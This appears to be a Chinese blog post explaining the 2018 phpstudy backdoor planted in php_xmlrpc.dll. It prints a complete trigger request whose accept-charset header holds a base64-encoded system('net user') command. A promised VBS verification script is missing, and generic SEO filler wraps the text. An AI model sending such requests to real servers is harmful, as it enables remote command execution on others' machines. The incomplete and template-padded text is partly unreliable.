很多朋友对于php网站源码分享后门检测和网站后门代码不太懂,今天就由小编来为大家分享,希望可以帮助到大家,下面一起来看看吧!
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。
犯罪分子主要是在php_xmlrpc.dll放入了恶意代码,可以利用它执行rce及反连等操作。
如果向其使用phpstudy的服务器发送发下格式数据包,就可以执行命令:
GET/HTTP/1.1\nHost:127.0.0.1\nUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:55.0)Gecko/20100101Firefox/55.0\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nConnection:close\naccept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\nAccept-Encoding:gzip,deflate\nUpgrade-Insecure-Requests:1\n
上边代码块中的ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7是echosystem(“netuser”);的base64编码。
我写了一个验证的vbs小程序,代码如下:
关于php网站源码分享后门检测和网站后门代码的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。